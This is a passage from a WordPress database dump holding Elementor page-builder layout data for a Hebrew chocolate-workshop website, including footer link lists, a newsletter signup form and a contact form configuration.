\\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(787,164,'_elementor_version','0.4'),(788,164,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(789,165,'_elementor_template_type','single'),(790,165,'_elementor_edit_mode','builder'),(791,165,'_wp_page_template','default'),(792,165,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(793,165,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7c736ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"081917e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8afb22\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"1154d95\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"8142c60\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 